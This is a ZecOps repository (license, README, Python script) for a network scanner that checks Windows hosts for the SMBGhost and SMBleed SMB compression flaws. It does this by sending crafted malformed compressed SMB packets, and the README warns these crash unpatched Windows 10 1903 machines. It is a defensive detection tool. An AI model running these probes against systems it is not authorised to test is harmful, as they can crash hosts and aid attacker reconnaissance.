├── LICENSE
├── README.md
└── SMBGhost-SMBleed-scanner.py


/LICENSE:
--------------------------------------------------------------------------------
1 | Custom license:
2 | Allowed for personal & educational usage.
3 | Not allowed for commercial usage without a prior written approval through ti@zecops.com.
4 | Use at your own risk.
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner
 2 | 
 3 | (c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes  
 4 | Intended only for educational and testing in corporate environments.  
 5 | ZecOps takes no responsibility for the code, use at your own risk.  
 6 | Please contact sales@ZecOps.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost, SMBleed and other types of attacks automatically.
 7 | 
 8 | ## Usage
 9 | 
10 | `SMBGhost-SMBleed-scanner.py target_ip`
11 | 
12 | The scanner will report whether the target machine is vulnerable to SMBGhost and/or SMBleed.
13 | 
14 | **Note:** The scanner will crash the target machine if it's running an unpatched Windows 10 version 1903. The crash is caused by a null dereference bug which is fixed by the **KB4512941** update.
15 | 
16 | ## References
17 | 
18 | * [Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog](https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/)
19 | * [SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost - ZecOps Blog](https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/)
20 | * [CVE-2020-0796 - Microsoft Security Response Center](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796)
21 | * [CVE-2020-1206 - Microsoft Security Response Center](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1206)
22 | 


--------------------------------------------------------------------------------
/SMBGhost-SMBleed-scanner.py:
--------------------------------------------------------------------------------
  1 | # SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner
  2 | # (c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
  3 | # Intended only for educational and testing in corporate environments.
  4 | # ZecOps takes no responsibility for the code, use at your own risk.
  5 | 
  6 | import socket, struct, sys, copy
  7 | 
  8 | class Smb2Header:
  9 |     def __init__(self, command, message_id=0, session_id=0):
 10 |         self.protocol_id = b"\xfeSMB"
 11 |         self.structure_size = b"\x40\x00"  # Must be set to 0x40
 12 |         self.credit_charge = b"\x00"*2
 13 |         self.channel_sequence = b"\x00"*2
 14 |         self.channel_reserved = b"\x00"*2
 15 |         self.command = struct.pack('<H', command)
 16 |         self.credits_requested = b"\x00"*2  # Number of credits requested / granted
 17 |         self.flags = b"\x00"*4
 18 |         self.chain_offset = b"\x00"*4  # Points to next message
 19 |         self.message_id = struct.pack('<Q', message_id)
 20 |         self.reserved = b"\x00"*4
 21 |         self.tree_id = b"\x00"*4  # Changes for some commands
 22 |         self.session_id = struct.pack('<Q', session_id)
 23 |         self.signature = b"\x00"*16
 24 | 
 25 |     def get_packet(self):
 26 |         return self.protocol_id + self.structure_size + self.credit_charge + self.channel_sequence + self.channel_reserved + self.command + self.credits_requested + self.flags + self.chain_offset + self.message_id + self.reserved + self.tree_id + self.session_id + self.signature
 27 | 
 28 | class Smb2NegotiateRequest:
 29 |     def __init__(self):
 30 |         self.header = Smb2Header(0)
 31 |         self.structure_size = b"\x24\x00"
 32 |         self.dialect_count = b"\x08\x00"  # 8 dialects
 33 |         self.security_mode = b"\x00"*2
 34 |         self.reserved = b"\x00"*2
 35 |         self.capabilities = b"\x7f\x00\x00\x00"
 36 |         self.guid = b"\x01\x02\xab\xcd"*4
 37 |         self.negotiate_context = b"\x78\x00"
 38 |         self.additional_padding = b"\x00"*2
 39 |         self.negotiate_context_count = b"\x02\x00"  # 2 Contexts
 40 |         self.reserved_2 = b"\x00"*2
 41 |         self.dialects = b"\x02\x02" + b"\x10\x02" + b"\x22\x02" + b"\x24\x02" + b"\x00\x03" + b"\x02\x03" + b"\x10\x03" + b"\x11\x03"  # SMB 2.0.2, 2.1, 2.2.2, 2.2.3, 3.0, 3.0.2, 3.1.0, 3.1.1
 42 |         self.padding = b"\x00"*4
 43 | 
 44 |     def context(self, type, length):
 45 |         data_length = length
 46 |         reserved = b"\x00"*4
 47 |         return type + data_length + reserved
 48 | 
 49 |     def preauth_context(self):
 50 |         hash_algorithm_count = b"\x01\x00"  # 1 hash algorithm
 51 |         salt_length = b"\x20\x00"
 52 |         hash_algorithm = b"\x01\x00"  # SHA512
 53 |         salt = b"\x00"*32
 54 |         pad = b"\x00"*2
 55 |         length = b"\x26\x00"
 56 |         context_header = self.context(b"\x01\x00", length)
 57 |         return context_header + hash_algorithm_count + salt_length + hash_algorithm + salt + pad
 58 | 
 59 |     def compression_context(self):
 60 |         #compression_algorithm_count = b"\x03\x00"  # 3 Compression algorithms
 61 |         compression_algorithm_count = b"\x01\x00"
 62 |         padding = b"\x00"*2
 63 |         flags = b"\x01\x00\x00\x00"
 64 |         #algorithms = b"\x01\x00" + b"\x02\x00" + b"\x03\x00"  # LZNT1 + LZ77 + LZ77+Huffman
 65 |         algorithms = b"\x01\x00"
 66 |         #length = b"\x0e\x00"
 67 |         length = b"\x0a\x00"
 68 |         context_header = self.context(b"\x03\x00", length)
 69 |         return context_header + compression_algorithm_count + padding + flags + algorithms
 70 | 
 71 |     def get_packet(self):
 72 |         padding = b"\x00"*8
 73 |         return self.header.get_packet() + self.structure_size + self.dialect_count + self.security_mode + self.reserved + self.capabilities + self.guid + self.negotiate_context + self.additional_padding + self.negotiate_context_count + self.reserved_2 + self.dialects + self.padding + self.preauth_context() + self.compression_context() + padding
 74 | 
 75 | class NetBIOSWrapper:
 76 |     def __init__(self, data):
 77 |         self.session = b"\x00"
 78 |         self.length = struct.pack('>i', len(data))[1:]
 79 |         self.data = data
 80 | 
 81 |     def get_packet(self):
 82 |         return self.session + self.length + self.data
 83 | 
 84 | class Smb2CompressedTransformHeader:
 85 |     def __init__(self, data, offset, original_decompressed_size):
 86 |         self.data = data
 87 |         self.protocol_id = b"\xfcSMB"
 88 |         self.original_decompressed_size = struct.pack('<i', original_decompressed_size)
 89 |         self.compression_algorithm = b"\x01\x00"
 90 |         self.flags = b"\x00"*2
 91 |         self.offset = struct.pack('<i', offset)
 92 | 
 93 |     def get_packet(self):
 94 |         return self.protocol_id + self.original_decompressed_size + self.compression_algorithm + self.flags + self.offset + self.data
 95 | 
 96 | class Smb2SessionSetupRequest:
 97 |     def __init__(self, message_id, buffer, session_id=0, padding=b''):
 98 |         self.header = Smb2Header(1, message_id, session_id)
 99 |         self.structure_size = b"\x19\x00"
100 |         self.flags = b"\x00"
101 |         self.security_mode = b"\x02"
102 |         self.capabilities = b"\x00"*4
103 |         self.channel = b"\x00"*4
104 |         self.security_buffer_offset = struct.pack('<H', 0x58 + len(padding))
105 |         self.security_buffer_length = struct.pack('<H', len(buffer))
106 |         self.previous_session_id = b"\x00\x00\x00\x00\x00\x00\x00\x00"
107 |         self.padding = padding
108 |         self.buffer = buffer
109 | 
110 |     def get_packet(self):
111 |         return (self.header.get_packet() +
112 |             self.structure_size +
113 |             self.flags +
114 |             self.security_mode +
115 |             self.capabilities +
116 |             self.channel +
117 |             self.security_buffer_offset +
118 |             self.security_buffer_length +
119 |             self.previous_session_id +
120 |             self.padding +
121 |             self.buffer)
122 | 
123 | class Smb2NtlmNegotiate:
124 |     def __init__(self):
125 |         self.signature = b"NTLMSSP\x00"
126 |         self.message_type = b"\x01\x00\x00\x00"
127 |         self.negotiate_flags = b"\x32\x90\x88\xe2"
128 |         self.domain_name_len = b"\x00\x00"
129 |         self.domain_name_max_len = b"\x00\x00"
130 |         self.domain_name_buffer_offset = b"\x28\x00\x00\x00"
131 |         self.workstation_len = b"\x00\x00"
132 |         self.workstation_max_len = b"\x00\x00"
133 |         self.workstation_buffer_offset = b"\x28\x00\x00\x00"
134 |         self.version = b"\x06\x01\xb1\x1d\x00\x00\x00\x0f"
135 |         self.payload_domain_name = b""
136 |         self.payload_workstation = b""
137 | 
138 |     def get_packet(self):
139 |         return (self.signature +
140 |             self.message_type +
141 |             self.negotiate_flags +
142 |             self.domain_name_len +
143 |             self.domain_name_max_len +
144 |             self.domain_name_buffer_offset +
145 |             self.workstation_len +
146 |             self.workstation_max_len +
147 |             self.workstation_buffer_offset +
148 |             self.version +
149 |             self.payload_domain_name +
150 |             self.payload_workstation)
151 | 
152 | # Source:
153 | # https://github.com/you0708/lznt1/blob/8ac366bb34d06ed867c71aad37ace7d95ceae198/lznt1.py
154 | def compress(buf, chunk_size=0x1000):
155 |     def _find(src, target, max_len):
156 |         result_offset = 0
157 |         result_length = 0
158 |         for i in range(1, max_len):
159 |             offset = src.rfind(target[:i])
160 |             if offset == -1:
161 |                 break
162 |             tmp_offset = len(src) - offset
163 |             tmp_length = i
164 |             if tmp_offset == tmp_length:
165 |                 tmp = src[offset:] * int(0xFFF / len(src[offset:]) + 1)
166 |                 for j in range(i, max_len+1):
167 |                     offset = tmp.rfind(target[:j])
168 |                     if offset == -1:
169 |                         break
170 |                     tmp_length = j
171 |             if tmp_length > result_length:
172 |                 result_offset = tmp_offset
173 |                 result_length = tmp_length
174 | 
175 |         if result_length < 3:
176 |             return 0, 0
177 |         return result_offset, result_length
178 | 
179 |     def _compress_chunk(chunk):
180 |         blob = copy.copy(chunk)
181 |         out = bytes()
182 |         pow2 = 0x10
183 |         l_mask3 = 0x1002
184 |         o_shift = 12
185 |         while len(blob) > 0:
186 |             bits = 0
187 |             tmp = bytes()
188 |             for i in range(8):
189 |                 bits >>= 1
190 |                 while pow2 < (len(chunk) - len(blob)):
191 |                     pow2 <<= 1
192 |                     l_mask3 = (l_mask3 >> 1) + 1
193 |                     o_shift -= 1
194 |                 if len(blob) < l_mask3:
195 |                     max_len = len(blob)
196 |                 else:
197 |                     max_len = l_mask3
198 | 
199 |                 offset, length = _find(chunk[:len(chunk) - len(blob)], blob, max_len)
200 | 
201 |                 # try to find more compressed pattern
202 |                 offset2, length2 = _find(chunk[:len(chunk) - len(blob)+1], blob[1:], max_len)
203 |                 if length < length2:
204 |                     length = 0
205 | 
206 |                 if length > 0:
207 |                     symbol = ((offset-1) << o_shift) | (length - 3)
208 |                     tmp += struct.pack('<H', symbol)
209 |                     bits |= 0x80 # set the highest bit
210 |                     blob = blob[length:]
211 |                 else:
212 |                     tmp += blob[0:1]
213 |                     blob = blob[1:]
214 |                 if len(blob) == 0:
215 |                     break
216 | 
217 |             out += struct.pack('B', bits >> (7 - i))
218 |             out += tmp
219 | 
220 |         return out
221 | 
222 |     out = bytes()
223 |     while buf:
224 |         chunk = buf[:chunk_size]
225 |         compressed = _compress_chunk(chunk)
226 |         if len(compressed) < len(chunk): # chunk is compressed
227 |             flags = 0xB000
228 |             header = struct.pack('<H' , flags|(len(compressed)-1))
229 |             out += header + compressed
230 |         else:
231 |             flags = 0x3000
232 |             header = struct.pack('<H' , flags|(len(chunk)-1))
233 |             out += header + chunk
234 |         buf = buf[chunk_size:]
235 | 
236 |     return out
237 | 
238 | def send_raw(sock, data):
239 |     packet = NetBIOSWrapper(data).get_packet()
240 |     sock.send(packet)
241 |     reply_size = sock.recv(4)
242 |     return sock.recv(struct.unpack('>I', reply_size)[0])
243 | 
244 | def send_negotiation(sock):
245 |     negotiate = Smb2NegotiateRequest().get_packet()
246 |     return send_raw(sock, negotiate)
247 | 
248 | def send_compressed(sock, data, offset, original_decompressed_size):
249 |     compressed = Smb2CompressedTransformHeader(data, offset, original_decompressed_size).get_packet()
250 |     return send_raw(sock, compressed)
251 | 
252 | def connect_and_send_compressed(ip_address, data, offset, original_decompressed_size):
253 |     with socket.socket(socket.AF_INET) as sock:
254 |         sock.settimeout(3)
255 |         sock.connect((ip_address, 445))
256 |         send_negotiation(sock)
257 |         return send_compressed(sock, data, offset, original_decompressed_size)
258 | 
259 | def connect_and_send_raw(ip_address, data):
260 |     with socket.socket(socket.AF_INET) as sock:
261 |         sock.settimeout(3)
262 |         sock.connect((ip_address, 445))
263 |         send_negotiation(sock)
264 |         return send_raw(sock, data)
265 | 
266 | def test_uncompressed(ip_address):
267 |     ntlm_negotiate = Smb2NtlmNegotiate().get_packet()
268 |     session_setup = Smb2SessionSetupRequest(1, ntlm_negotiate).get_packet()
269 |     return connect_and_send_raw(ip_address, session_setup)
270 | 
271 | def test_compressed_benign(ip_address):
272 |     ntlm_negotiate = Smb2NtlmNegotiate().get_packet()
273 |     session_setup = Smb2SessionSetupRequest(1, ntlm_negotiate).get_packet()
274 |     return connect_and_send_compressed(ip_address, compress(session_setup), 0, len(session_setup))
275 | 
276 | def test_compressed_smbghost(ip_address):
277 |     ntlm_negotiate = Smb2NtlmNegotiate().get_packet()
278 |     session_setup = Smb2SessionSetupRequest(1, ntlm_negotiate).get_packet()
279 |     return connect_and_send_compressed(ip_address, session_setup + b'\x00'*16, len(session_setup), -1)
280 | 
281 | def test_compressed_smbleed(ip_address):
282 |     ntlm_negotiate = Smb2NtlmNegotiate().get_packet()
283 |     session_setup = Smb2SessionSetupRequest(1, ntlm_negotiate).get_packet()
284 |     return connect_and_send_compressed(ip_address, compress(session_setup), 0, len(session_setup) + 1)
285 | 
286 | def scan(ip_address):
287 |     print('[+] Sending benign uncompressed SMB packet...')
288 |     try:
289 |         test_uncompressed(ip_address)
290 |     except Exception as e:
291 |         print('[!] ' + str(e).capitalize())
292 |         return 'SMB is inaccessible via target IP, make sure the IP address is correct and check your firewall'
293 | 
294 |     print('[+] Sending benign compressed SMB packet...')
295 |     try:
296 |         test_compressed_benign(ip_address)
297 |     except Exception as e:
298 |         print('[!] ' + str(e).capitalize())
299 | 
300 |         print('[+] Sending another benign uncompressed SMB packet...')
301 |         try:
302 |             test_uncompressed(ip_address)
303 |             return 'SMB compression is disabled or not supported, target is not vulnerable'
304 |         except Exception as e:
305 |             print('[!] ' + str(e).capitalize())
306 |             return ('Target no longer accessible, probably a buggy Windows 10 1903 version, '
307 |                 'VULNERABLE to SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206)')
308 | 
309 |     print('[+] Sending compressed SMB packet with integer overflow...')
310 |     try:
311 |         test_compressed_smbghost(ip_address)
312 |         return 'Packet wasn\'t discarded, target is VULNERABLE to SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206)'
313 |     except Exception as e:
314 |         print('[!] ' + str(e).capitalize())
315 | 
316 |     print('[+] Sending compressed SMB packet with fake data size...')
317 |     try:
318 |         test_compressed_smbleed(ip_address)
319 |         return 'Packet wasn\'t discarded, target is VULNERABLE to SMBleed (CVE-2020-1206)'
320 |     except Exception as e:
321 |         print('[!] ' + str(e).capitalize())
322 | 
323 |     return 'Target is not vulnerable'
324 | 
325 | if __name__ == "__main__":
326 |     print('SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner')
327 |     print('(c) 2020 ZecOps, Inc.')
328 |     print()
329 | 
330 |     if len(sys.argv) != 2:
331 |         exit(f'Usage: {sys.argv[0]} target_ip')
332 | 
333 |     target_ip = sys.argv[1]
334 |     verdict = scan(target_ip)
335 | 
336 |     print()
337 |     print('Verdict: ' + verdict)
338 | 


--------------------------------------------------------------------------------